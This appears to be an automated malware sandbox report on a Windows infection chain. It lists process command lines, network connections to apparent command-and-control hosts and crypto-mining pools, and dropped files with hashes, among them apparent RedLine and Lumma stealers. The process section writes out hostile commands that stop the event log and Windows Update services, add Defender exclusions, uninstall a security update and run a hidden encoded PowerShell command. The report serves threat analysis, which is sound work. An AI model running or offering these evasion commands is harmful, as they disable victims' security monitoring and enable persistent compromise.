C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0

C:\Windows\system32\conhost.exe

C:\Windows\system32\conhost.exe

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "gBaxREWWY"

C:\Windows\SysWOW64\gpupdate.exe

"C:\Windows\system32\gpupdate.exe" /force

C:\Windows\SysWOW64\gpupdate.exe

"C:\Windows\system32\gpupdate.exe" /force

C:\Windows\explorer.exe

explorer.exe

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop eventlog

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe start "WSNKISKT"

C:\ProgramData\wikombernizc\reakuqnanrkn.exe

C:\ProgramData\wikombernizc\reakuqnanrkn.exe

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop UsoSvc

C:\Windows\system32\wusa.exe

wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop WaaSMedicSvc

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop wuauserv

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop bits

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop dosvc

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0

C:\Windows\system32\conhost.exe

C:\Windows\system32\conhost.exe

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "gBaxREWWY"

Network

Country Destination Domain Proto
RU 5.42.96.7:80 5.42.96.7 tcp
RU 77.221.151.47:80 77.221.151.47 tcp
RU 185.215.113.67:26260 tcp
RU 5.42.96.78:80 5.42.96.78 tcp
RU 77.221.151.47:8080 tcp
DE 185.172.128.19:80 185.172.128.19 tcp
DE 185.172.128.19:80 185.172.128.19 tcp
US 8.8.8.8:53 file-file-host6.com udp
RU 5.101.50.183:80 file-file-host6.com tcp
US 8.8.8.8:53 pastebin.com udp
US 8.8.8.8:53 yip.su udp
US 172.67.169.89:443 yip.su tcp
US 104.20.3.235:443 pastebin.com tcp
RU 77.221.151.47:9090 tcp
RU 5.42.96.64:80 5.42.96.64 tcp
US 8.8.8.8:53 onlycitylink.com udp
RU 5.42.96.78:80 5.42.96.78 tcp
US 8.8.8.8:53 realdeepai.org udp
US 8.8.8.8:53 1xst.ru udp
US 172.67.193.79:443 realdeepai.org tcp
US 104.21.18.166:443 onlycitylink.com tcp
US 104.21.18.166:443 onlycitylink.com tcp
RU 5.42.96.78:80 5.42.96.78 tcp
US 172.67.193.79:443 realdeepai.org tcp
US 8.8.8.8:53 free.360totalsecurity.com udp
US 8.8.8.8:53 firstfirecar.com udp
US 8.8.8.8:53 firstfirecar.com udp
US 8.8.8.8:53 jonathantwo.com udp
US 8.8.8.8:53 jonathantwo.com udp
US 104.21.60.76:443 firstfirecar.com tcp
US 172.67.176.131:443 jonathantwo.com tcp
US 104.21.60.76:443 firstfirecar.com tcp
US 104.21.31.124:443 jonathantwo.com tcp
RO 109.98.58.98:80 1xst.ru tcp
NL 151.236.127.172:443 free.360totalsecurity.com tcp
US 8.8.8.8:53 xmr.2miners.com udp
RO 109.98.58.98:80 1xst.ru tcp
DE 162.19.139.184:2222 xmr.2miners.com tcp
US 8.8.8.8:53 parrotflight.com udp
US 172.67.187.204:443 parrotflight.com tcp
US 8.8.8.8:53 apps.identrust.com udp
US 8.8.8.8:53 apps.identrust.com udp
US 8.8.8.8:53 apps.identrust.com udp
US 8.8.8.8:53 apps.identrust.com udp
US 2.18.190.81:80 apps.identrust.com tcp
US 2.18.190.81:80 apps.identrust.com tcp
US 2.18.190.81:80 apps.identrust.com tcp
US 2.18.190.80:80 apps.identrust.com tcp
RU 77.221.151.47:8080 tcp
RU 77.221.151.47:8080 tcp
US 8.8.8.8:53 junglethomas.com udp
US 172.67.197.33:443 junglethomas.com tcp
RU 5.42.66.10:80 5.42.66.10 tcp
US 8.8.8.8:53 api.myip.com udp
RU 77.221.151.47:8080 tcp
US 8.8.8.8:53 tr.p.360safe.com udp
US 8.8.8.8:53 st.p.360safe.com udp
US 8.8.8.8:53 iup.360safe.com udp
US 104.26.8.59:443 api.myip.com tcp
IE 54.76.174.118:80 tr.p.360safe.com udp
IE 54.77.42.29:3478 st.p.360safe.com udp
IE 54.77.42.29:3478 st.p.360safe.com udp
DE 151.236.118.173:80 iup.360safe.com tcp
DE 151.236.118.173:80 iup.360safe.com tcp
DE 151.236.118.173:80 iup.360safe.com tcp
DE 151.236.118.173:80 iup.360safe.com tcp
DE 151.236.118.173:80 iup.360safe.com tcp
DE 151.236.118.173:80 iup.360safe.com tcp
US 8.8.8.8:53 int.down.360safe.com udp
US 104.192.108.17:80 int.down.360safe.com tcp
US 104.192.108.21:80 int.down.360safe.com tcp
US 104.192.108.20:80 int.down.360safe.com tcp
US 104.192.108.17:80 int.down.360safe.com tcp
US 104.192.108.20:80 int.down.360safe.com tcp
US 8.8.8.8:53 ipinfo.io udp
US 104.192.108.17:80 int.down.360safe.com tcp
US 34.117.186.192:443 ipinfo.io tcp
US 34.117.186.192:443 ipinfo.io tcp
US 8.8.8.8:53 s.360safe.com udp
DE 52.29.179.141:80 s.360safe.com tcp
DE 52.29.179.141:80 s.360safe.com tcp
US 8.8.8.8:53 sd.p.360safe.com udp
DE 52.29.179.141:80 s.360safe.com tcp
US 3.162.143.213:80 sd.p.360safe.com tcp
RU 5.42.96.78:80 5.42.96.78 tcp
RU 77.221.151.47:8080 tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
RU 77.221.151.47:8080 tcp
RU 77.221.151.47:8080 tcp
RU 77.221.151.47:8080 tcp
RU 77.221.151.47:8080 tcp
RU 77.221.151.47:8080 tcp
US 8.8.8.8:53 trad-einmyus.com udp
RU 5.101.50.183:80 trad-einmyus.com tcp
RU 5.101.50.183:80 trad-einmyus.com tcp
RU 5.101.50.183:80 trad-einmyus.com tcp
RU 5.101.50.183:80 trad-einmyus.com tcp
RU 5.101.50.183:80 trad-einmyus.com tcp
RU 77.221.151.47:8080 tcp
RU 5.101.50.183:80 trad-einmyus.com tcp
RU 5.101.50.183:80 trad-einmyus.com tcp
RU 5.101.50.183:80 trad-einmyus.com tcp
US 8.8.8.8:53 sdfjhuz.com udp
MX 189.130.155.217:80 sdfjhuz.com tcp
RU 5.101.50.183:80 trad-einmyus.com tcp
RU 5.101.50.183:80 trad-einmyus.com tcp
RU 5.101.50.183:80 trad-einmyus.com tcp
RU 5.101.50.183:80 trad-einmyus.com tcp
RU 5.101.50.183:80 trad-einmyus.com tcp
RU 5.101.50.183:80 trad-einmyus.com tcp
US 8.8.8.8:53 www.safeautomationbd.com udp
BD 103.174.152.66:443 www.safeautomationbd.com tcp
BD 103.174.152.66:443 www.safeautomationbd.com tcp
RU 77.221.151.47:8080 tcp
RU 5.101.50.183:80 trad-einmyus.com tcp
RU 5.101.50.183:80 trad-einmyus.com tcp
US 8.8.8.8:53 trad-einmyus.com udp
RU 5.101.50.183:80 trad-einmyus.com tcp
RU 5.101.50.183:80 trad-einmyus.com tcp
RU 5.101.50.183:80 trad-einmyus.com tcp
RU 5.101.50.183:80 trad-einmyus.com tcp
US 8.8.8.8:53 trad-einmyus.com udp
RU 5.101.50.183:80 trad-einmyus.com tcp
RU 77.221.151.47:8080 tcp
RU 5.101.50.183:80 trad-einmyus.com tcp
RU 77.221.151.47:9090 tcp
US 8.8.8.8:53 nessotechbd.com udp
US 192.185.16.114:443 nessotechbd.com tcp
US 192.185.16.114:443 nessotechbd.com tcp
RU 5.101.50.183:80 trad-einmyus.com tcp
RU 5.101.50.183:80 trad-einmyus.com tcp
RU 5.101.50.183:80 trad-einmyus.com tcp
US 8.8.8.8:53 drive.google.com udp
FR 142.250.201.174:443 drive.google.com tcp
RU 77.221.151.47:8080 tcp
RU 5.101.50.183:80 trad-einmyus.com tcp
US 104.192.108.21:80 int.down.360safe.com tcp
RU 77.221.151.47:8080 tcp
US 8.8.8.8:53 trad-einmyus.com udp
RU 5.101.50.183:80 trad-einmyus.com tcp
US 104.192.108.20:80 int.down.360safe.com tcp
US 104.192.108.20:80 int.down.360safe.com tcp
RU 5.101.50.183:80 trad-einmyus.com tcp
RU 77.221.151.47:8080 tcp
RU 5.101.50.183:80 trad-einmyus.com tcp
RU 77.221.151.47:8080 tcp
RU 5.101.50.183:80 trad-einmyus.com tcp
RU 5.101.50.183:80 trad-einmyus.com tcp
RU 77.221.151.47:8080 tcp
NL 91.92.253.69:80 tcp
DE 45.76.89.70:80 tcp
US 8.8.8.8:53 zeph-eu2.nanopool.org udp
RU 77.221.151.47:8080 tcp
US 104.192.108.21:80 int.down.360safe.com tcp
US 104.192.108.20:80 int.down.360safe.com tcp
US 8.8.8.8:53 api.telegram.org udp
NL 149.154.167.220:443 api.telegram.org tcp
US 8.8.8.8:53 pastebin.com udp
US 172.67.19.24:443 pastebin.com tcp
NL 51.15.89.13:10943 zeph-eu2.nanopool.org tcp
RU 77.221.151.47:8080 tcp
US 104.192.108.20:80 int.down.360safe.com tcp
US 104.192.108.21:80 int.down.360safe.com tcp
US 104.192.108.20:80 int.down.360safe.com tcp
US 104.192.108.17:80 int.down.360safe.com tcp
US 104.192.108.20:80 int.down.360safe.com tcp
US 104.192.108.17:80 int.down.360safe.com tcp
US 104.192.108.21:80 int.down.360safe.com tcp
US 104.192.108.20:80 int.down.360safe.com tcp
US 104.192.108.17:80 int.down.360safe.com tcp
RU 77.221.151.47:8080 tcp
US 104.192.108.20:80 int.down.360safe.com tcp
US 104.192.108.17:80 int.down.360safe.com tcp
US 8.8.8.8:53 beshomandotestbesnd.run.place udp
US 45.88.186.125:7000 beshomandotestbesnd.run.place tcp

Files

memory/1784-0-0x0000000000870000-0x0000000000D41000-memory.dmp

memory/1784-1-0x0000000077640000-0x0000000077642000-memory.dmp

memory/1784-2-0x0000000000871000-0x000000000089F000-memory.dmp

memory/1784-3-0x0000000000870000-0x0000000000D41000-memory.dmp

memory/1784-5-0x0000000000870000-0x0000000000D41000-memory.dmp

memory/1784-6-0x0000000000870000-0x0000000000D41000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe

MD5 17ee93b40d1746f9d99cf8521a2ab566
SHA1 371e878e7c8ff19a0f8771aefef9aeb6e28c2b87
SHA256 49d7d5e73d9bf10aac8ccb3216044892e98b3da688651a25cc20bb925f5f1468
SHA512 21f8f6cf4d58775e4498bb1bb86437c30494d633da800ef3427bce4d7e4877018752fb091eb4627ccb0d14bc9f45afd199c752fceb1f4202d2b9d94efc6d01a7

memory/1784-16-0x0000000000870000-0x0000000000D41000-memory.dmp

memory/2560-17-0x0000000001040000-0x0000000001511000-memory.dmp

memory/2560-18-0x0000000001041000-0x000000000106F000-memory.dmp

memory/2560-19-0x0000000001040000-0x0000000001511000-memory.dmp

memory/2560-21-0x0000000001040000-0x0000000001511000-memory.dmp

memory/2560-22-0x0000000001040000-0x0000000001511000-memory.dmp

memory/2560-23-0x0000000001040000-0x0000000001511000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1000003001\alex.exe

MD5 31841361be1f3dc6c2ce7756b490bf0f
SHA1 ff2506641a401ac999f5870769f50b7326f7e4eb
SHA256 222393a4ab4b2ae83ca861faee6df02ac274b2f2ca0bed8db1783dd61f2f37ee
SHA512 53d66fa19e8db360042dadc55caaa9a1ca30a9d825e23ed2a58f32834691eb2aaaa27a4471e3fc4d13e201accc43160436ed0e9939df1cc227a62a09a2ae0019

C:\Users\Admin\AppData\Local\Temp\1000004001\gold.exe

MD5 7f981db325bfed412599b12604bd00ab
SHA1 9f8a8fd9df3af3a4111e429b639174229c0c10cd
SHA256 043839a678bed1b10be00842eae413f5ecd1cad7a0eaa384dd80bc1dcd31e69b
SHA512 a5be61416bc60669523e15213098a6d3bb5a2393612b57863fedfa1ff974bc110e0b7e8aadc97d0c9830a80798518616f9edfb65ae22334a362a743b6af3a82d

memory/1816-59-0x0000000000030000-0x0000000000031000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1000005001\redline1.exe

MD5 9faf597de46ed64912a01491fe550d33
SHA1 49203277926355afd49393782ae4e01802ad48af
SHA256 0854678d655668c8ebb949c990166e26a4c04aef4ecf0191a95693ca150a9715
SHA512 ef8a7a8566eaf962c4e21d49d9c1583ed2cdc9c2751ce75133a9765d2fa6dc511fc6cc99ea871eb83d50bd08a31cb0b25c03f27b8e6f351861231910a6cf1a1e

memory/1836-78-0x0000000000290000-0x00000000002E2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\TmpB08B.tmp

MD5 1420d30f964eac2c85b2ccfe968eebce
SHA1 bdf9a6876578a3e38079c4f8cf5d6c79687ad750
SHA256 f3327793e3fd1f3f9a93f58d033ed89ce832443e2695beca9f2b04adba049ed9
SHA512 6fcb6ce148e1e246d6805502d4914595957061946751656567a5013d96033dd1769a22a87c45821e7542cde533450e41182cee898cd2ccf911c91bc4822371a8

C:\Users\Admin\AppData\Local\Temp\1000006001\install.exe

MD5 0f52e5e68fe33694d488bfe7a1a71529
SHA1 11d7005bd72cb3fd46f24917bf3fc5f3203f361f
SHA256 efd29c35766c607aa15d1cb83dec625739791b1616ad37d5b47e78cdb8a42ca8
SHA512 238fbb1c04eef2f2005cb7abf0223e3cd062d9d2840966292e19dcaa495609e134a0bdc35389ae9925ecfc787a13772d3ac7b29058579f702bc849dd0343c400

C:\Users\Admin\AppData\Local\Temp\1000007001\swizzhis.exe

MD5 808c0214e53b576530ee5b4592793bb0
SHA1 3fb03784f5dab1e99d5453664bd3169eff495c97
SHA256 434b1a9bd966d204eef1f4cddb7b73a91ebc5aaf4ac9b4ddd999c6444d92eb61
SHA512 2db3b4cb0233230e7c21cd820bde5de00286fbaedd3fe4dcefb6c66fe6867431f0ee1753fc18dcb89b2a18e888bd15d4d2de29b1d5cd93e425e3fcfe508c79c0

C:\Program Files (x86)\GameSyncLink\installg.bat

MD5 5dee3cbf941c5dbe36b54690b2a3c240
SHA1 82b9f1ad3ca523f3794e052f7e67ecdcd1ae87e1
SHA256 98370b86626b8fd7a7cac96693348045b081326c49e2421113f49a5ea3588edb
SHA512 9ee431d485e2f09268a22b287b0960859d2f22db8c7e61309a042999c436b3de74f5d75837b739e01122a796ad65bc6468d009ec6ddf4962f4ff288155410556

memory/2560-136-0x0000000001040000-0x0000000001511000-memory.dmp

C:\Program Files (x86)\GameSyncLink\GameService.exe

MD5 d9ec6f3a3b2ac7cd5eef07bd86e3efbc
SHA1 e1908caab6f938404af85a7df0f80f877a4d9ee6
SHA256 472232ca821b5c2ef562ab07f53638bc2cc82eae84cea13fbe674d6022b6481c
SHA512 1b6b8702dca3cb90fe64c4e48f2477045900c5e71dd96b84f673478bab1089febfa186bfc55aebd721ca73db1669145280ebb4e1862d3b9dc21f712cd76a07c4

C:\Users\Admin\AppData\Local\Temp\1000010001\lumma1.exe

MD5 56e7d98642cfc9ec438b59022c2d58d7
SHA1 26526f702e584d8c8b629b2db5d282c2125665d7
SHA256 a2aa61942bae116f8c855fda0e9a991dba92b3a1e2f147aee0e7e2be1bdea383
SHA512 0be0b11de472029bd4e2268cddb5ddb381f7f275dfe50c47b9c836980e5cbfa7f71fe78804ef2180ee110ca9cf36944ec8b8b22babb31a1fc7a6585f79932a1f

\Program Files (x86)\GameSyncLink\GameSyncLink.exe

MD5 e6943a08bb91fc3086394c7314be367d
SHA1 451d2e171f906fa6c43f8b901cd41b0283d1fa40
SHA256 aafdcfe5386452f4924cfcc23f2cf7eccf3f868947ad7291a77b2eca2af0c873
SHA512 505d3c76988882602f06398e747c4e496ecad9df1b7959069b87c8111c4d9118484f4d6baef5f671466a184c8caec362d635da210fa0987ccb746cbeea218d2a

C:\Windows\Temp\127055.exe

MD5 5c9e996ee95437c15b8d312932e72529
SHA1 eb174c76a8759f4b85765fa24d751846f4a2d2ef
SHA256 0eecdbfabaaef36f497e944a6ceb468d01824f3ae6457b4ae4b3ac8e95eebb55
SHA512 935102aad64da7eeb3e4b172488b3a0395298d480f885ecedc5d8325f0a9eabeea8ba1ece512753ac170a03016c80ba4990786ab608b4de0b11e6343fbf2192b

memory/2560-182-0x0000000001040000-0x0000000001511000-memory.dmp

C:\Windows\Temp\cudart64_101.dll

MD5 1d7955354884a9058e89bb8ea34415c9
SHA1 62c046984afd51877ecadad1eca209fda74c8cb1
SHA256 111f216aef35f45086888c3f0a30bb9ab48e2b333daeddafd3a76be037a22a6e
SHA512 7eb8739841c476cda3cf4c8220998bc8c435c04a89c4bbef27b8f3b904762dede224552b4204d35935562aa73f258c4e0ddb69d065f732cb06cc357796cdd1b2

C:\Program Files (x86)\GameSyncLink\installc.bat

MD5 998ab24316795f67c26aca0f1b38c8ce
SHA1 a2a6dc94e08c086fe27f8c08cb8178e7a64f200d
SHA256 a468b43795f1083fb37b12787c5ff29f8117c26ac35af470084e00c48280442e
SHA512 7c9c2ade898a8defb6510ddd15730bec859d4474071eb6b8e8738ea6089764f81924ad2a6ebf0479d4fed7d61890edaa38f4bfbf70a4e6b30d33aa5bfc5b5c75

C:\Users\Admin\AppData\Local\Temp\1000013001\file300un.exe

MD5 d18dbc8c3596af59d661a2d0437bb173
SHA1 0a88bb498001120fc5ae83764c5339f06ae70bac
SHA256 ca58a17fe665c5997d673e7e5317d2a70dc2225ced1dbeea010888874ae48a81
SHA512 25c2563ec9bf5fbd9f8c3a0606015ba93f4cfd8a8ea9dae72b34fc43c57cb024c3fb97b6bf82b6a59d79b092c014c4c47ca202126755a96880e7476cc91e5e76

C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe

MD5 72b396a9053dff4d804e07ee1597d5e3
SHA1 5ec4fefa66771613433c17c11545c6161e1552d5
SHA256 d0b206f0f47a9f8593b6434dc27dadde8480a902e878882fa8c73fc7fe01b11d
SHA512 ad96c9ca2feae7af7fcf01a843d5aa6cbdde0520d68dedff44554a17639c6c66b2301d73daf272708cb76c22eae2d5c89db23af45105c4f0e35f4787f98e192b

memory/2560-220-0x0000000005FB0000-0x00000000062F9000-memory.dmp

memory/1648-221-0x000000013F150000-0x000000013F499000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1000015001\NewB.exe

MD5 0099a99f5ffb3c3ae78af0084136fab3
SHA1 0205a065728a9ec1133e8a372b1e3864df776e8c
SHA256 919ae827ff59fcbe3dbaea9e62855a4d27690818189f696cfb5916a88c823226
SHA512 5ac4f3265c7dd7d172284fb28c94f8fc6428c27853e70989f4ec4208f9897be91720e8eee1906d8e843ab05798f3279a12492a32e8a118f5621ac5e1be2031b6

memory/2560-234-0x0000000001040000-0x0000000001511000-memory.dmp

C:\Program Files (x86)\GameSyncLink\installm.bat

MD5 94b87b86dc338b8f0c4e5869496a8a35
SHA1 2584e6496d048068f61ac72f5c08b54ad08627c3
SHA256 2928d8e9a41f39d3802cfd2900d8edeb107666baa942d9c0ffbfd0234b5e5bfc
SHA512 b67eb73fe51d4dba990789f1e0123e902dac6d26569851c3d51ca0a575221ce317f973999d962669016017d8f81a01f11bd977609e66bb1b244334bce2db5d5d

C:\Users\Admin\AppData\Local\Temp\1000024001\taskmgr.exe

MD5 73309cc961f9645c1c2562ffcdc2dab1
SHA1 6a8545c08c931e016198c80b304ade1c1e8f7a17
SHA256 287e94024ef4ea0f1d9aad740b75a2ff594dd93062848867ed028ac719143298
SHA512 89858a407acbc7c13a4bd40031abd6803c311d381a37702631b1739d9f0e67c6afae50e6d1188b54a7d0e1ddfbcb6857b68f8f44cad3b10b1b31b53f1b676914

memory/1184-250-0x0000000000400000-0x0000000000408000-memory.dmp

memory/1648-253-0x000000013F150000-0x000000013F499000-memory.dmp

memory/1184-252-0x0000000000400000-0x0000000000408000-memory.dmp

memory/1184-251-0x0000000000400000-0x0000000000408000-memory.dmp

memory/2560-257-0x0000000001040000-0x0000000001511000-memory.dmp

memory/1712-256-0x0000000000910000-0x0000000000948000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1000255001\toolspub1.exe

MD5 6bcbbfac4eb7dbecb5a44983645a75db
SHA1 06335c12d2dc398efa4956674628debaf8a22b39
SHA256 f73c2ff7df05fca90c08e6ac7a30b97f56a5f62ddc1aed09e0970dc416f995aa
SHA512 550b13098d9842bc79b441721b6a93f085d75c274d7b5e0387fae87f9cf5a3566fb13694b5369149e093cb41a109fa015a9698f0553827c8c46c864083a54a33

memory/2120-279-0x0000000000090000-0x00000000000B0000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E0F5C59F9FA661F6F4C50B87FEF3A15A

MD5 30b2df7d4cdffd12c9fea921b340e045
SHA1 d48e708916f99e4456d43ffb03f0d5607119fcab
SHA256 ba6569e5400014b55756e171a589fcc2e93dbe2fc97f4e3623c86adfa06aedf0
SHA512 df8316a693e698f31c89fff79d7d777bc85e1e9cd428c5e4cae96956ca058eeaa6444090da357ae6910f9e17dac3c39c72387e59925f99856bc4f50dc1ae6090

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E0F5C59F9FA661F6F4C50B87FEF3A15A

MD5 d4ae187b4574036c2d76b6df8a8c1a30
SHA1 b06f409fa14bab33cbaf4a37811b8740b624d9e5
SHA256 a2ce3a0fa7d2a833d1801e01ec48e35b70d84f3467cc9f8fab370386e13879c7
SHA512 1f44a360e8bb8ada22bc5bfe001f1babb4e72005a46bc2a94c33c4bd149ff256cce6f35d65ca4f7fc2a5b9e15494155449830d2809c8cf218d0b9196ec646b0c

C:\Users\Admin\AppData\Local\Temp\TarE056.tmp

MD5 9c0c641c06238516f27941aa1166d427
SHA1 64cd549fb8cf014fcd9312aa7a5b023847b6c977
SHA256 4276af3669a141a59388bc56a87f6614d9a9bdddf560636c264219a7eb11256f
SHA512 936ed0c0b0a7ff8e606b1cc4175a1f9b3699748ccbba1c3aff96203033d2e9edabf090e5148370df42fbfc4e31d7229493706ff24f19ff42ff7bef74a6baad06

C:\Users\Admin\AppData\Local\Temp\CabE054.tmp

MD5 ac05d27423a85adc1622c714f2cb6184
SHA1 b0fe2b1abddb97837ea0195be70ab2ff14d43198
SHA256 c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d
SHA512 6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

C:\Users\Admin\AppData\Local\Temp\TarE2A1.tmp

MD5 435a9ac180383f9fa094131b173a2f7b
SHA1 76944ea657a9db94f9a4bef38f88c46ed4166983
SHA256 67dc37ed50b8e63272b49a254a6039ee225974f1d767bb83eb1fd80e759a7c34
SHA512 1a6b277611959720a9c71114957620517ad94541302f164eb872bd322292a952409bafb8bc2ac793b16ad5f25d83f8594ccff2b7834e3c2b2b941e6fc84c009a

C:\Users\Admin\AppData\Local\Temp\7ZSfx000.cmd

MD5 2dbc71afdfa819995cded3cc0b9e2e2e
SHA1 60e1703c3fd4fe0fba9f1e65e10a61e0e72d9faf
SHA256 5a0070457636d37c11deb3148f6914583148fe45a66f44d7852f007ed5aad0ac
SHA512 0c59fa999ed912e6e747017c4e4c73f37ed7a72654f95eaea3db899308468e8756621db6e4edfd79e456ec69ce2e3e880817410b6aab1d01414f6300240d8b52

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

MD5 29f65ba8e88c063813cc50a4ea544e93
SHA1 05a7040d5c127e68c25d81cc51271ffb8bef3568
SHA256 1ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184
SHA512 e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 0be08ef8422953f1ff293b0dff0457c0
SHA1 a3e7066c19d29e88c4f0acbe598c1f731c391a84
SHA256 f41a8d7a06aa71397efb2167cea555f0d3285a1b14ce70eee36a1df13805cfec
SHA512 7b3a467e36d00fcc4220897a31e2f915fc820e4d173a7d1c3923483bd6033aa3143bb7380dff7c49d7e1e4a298a92adec0dfdecef9d78ba50ba1c52d1400dd15

memory/1920-442-0x0000000077230000-0x000000007732A000-memory.dmp

memory/1920-441-0x0000000077330000-0x000000007744F000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 0ae76bb8c8863b3fced972f129d44167
SHA1 62a2e6aed2e5d3c5e30629e3b2fa36edc80d3c21
SHA256 910ee45542239f5aad8d2efc4d9948be06a41e35853a46c2b2c2804f743ffdb9
SHA512 5edb6b189af2538156c9952394e592c276706fff4ed12cd35e4b9f1f047dccbcd7ba9abc2d2f0f1056a2d7ea661d617b12e49cb145925ef0e50f807238c7e1b8

memory/2560-538-0x0000000001040000-0x0000000001511000-memory.dmp

C:\Users\Admin\Pictures\aFeO3W4FMAYpzXDCQxnEUJVc.exe

MD5 2af5ceffa3035e5e8910c4fdcfd3ab83
SHA1 a49b2810d1451c252dc38ccb63a3ec31501948fe
SHA256 647f2ccbb1b8b9809ba8149ab3c7acf70cddb752ab6a4dc86eb5515bddb0cd58
SHA512 53449df9f1f971a13c427c3c7e31fc3315ca2d1a23124fe42ca11d53ebdfa46d49972ae8b43987f44c06c3d4fbc434bc6fefb2976ec42376d08196bfd26143e0

C:\Users\Admin\Pictures\R3korVHT4WNZUjkc4bHNZ2rr.exe

MD5 6a5836434f915a2de723a1b2ddc29a66
SHA1 a643e23618895ea03f86d4f41379933cd99dc8b1
SHA256 95ffbdc57165bcd4e41b3390f5b8094b7243b3fb95f9b989e72a98c8a9616584
SHA512 65d6c70098646ac1dca54c986b9a4886ccf9977d053aa9746f107d3258893321c00e30c630c60a8285ed1c93c46beae8d55fa89a3362f8515e5358ac78c3be5f

memory/2388-568-0x0000000004430000-0x0000000004828000-memory.dmp

C:\Users\Admin\Pictures\gSyoK3N9HzpEDXDVRb23pzgh.exe

MD5 d3dee883e0288772cdaaccef38fec68d
SHA1 ed12b66117d6f0993725e7ce71c6461af2eba18c
SHA256 f338d4cafffabb5a2d09561761c6475750444481c6e07dab40f50197a7e110b5
SHA512 37c18be628f898ea772897e7656b9286b01a4dcea5173abfe3adfdc3b3b1fe83eac137676ddf47a43fa289147e62ed987b2364a0ec27041fdfea2e83826687b4

C:\Users\Admin\Pictures\RxGmeplSAOH7kpj64hcY0qDA.exe

MD5 a820588766207bdd82ac79ff4f553b6f
SHA1 2e3985344dddfc9c88d5f5a22bdfa932259332d3
SHA256 0209678b3cb7b5d67d9a73fbdce851148909ecdba3b8766d5a59eca4cb848e05
SHA512 cc052c5021ec0f18e3b24701bdf9425ffdee67645eadab5f27f8dd073eb4711a824e77c83b39cb2d2a0de44733bd09504aba466120393bb63001c8d80aa76656

memory/1792-581-0x00000000044C0000-0x00000000048B8000-memory.dmp

memory/1680-585-0x00000000043D0000-0x00000000047C8000-memory.dmp

memory/1184-586-0x000000000C920000-0x000000000D375000-memory.dmp

memory/1624-601-0x0000000140000000-0x0000000140A55000-memory.dmp

memory/1848-609-0x00000000043F0000-0x00000000047E8000-memory.dmp

memory/2296-608-0x0000000000400000-0x0000000000793000-memory.dmp

C:\Windows\System32\GroupPolicy\gpt.ini

MD5 8ef9853d1881c5fe4d681bfb31282a01
SHA1 a05609065520e4b4e553784c566430ad9736f19f
SHA256 9228f13d82c3dc96b957769f6081e5bac53cffca4ffde0ba1e102d9968f184a2
SHA512 5ddee931a08cfea5bb9d1c36355d47155a24d617c2a11d08364ffc54e593064011dee4fea8ac5b67029cab515d3071f0ba0422bb76af492a3115272ba8feb005

memory/2296-621-0x0000000000400000-0x0000000000793000-memory.dmp

memory/1176-620-0x0000000002EA0000-0x0000000002EB6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1000256001\4767d2e713f2021e8fe856e3ea638b58.exe

MD5 1157922d694e53092c8c05331878f8a1
SHA1 f63cbc1b6e261bd011352c0f64ec6238ec37c397
SHA256 2546c196a3636ae61a971fd718a9feff3dd2b137ab96fc5f256f111b165cbf62
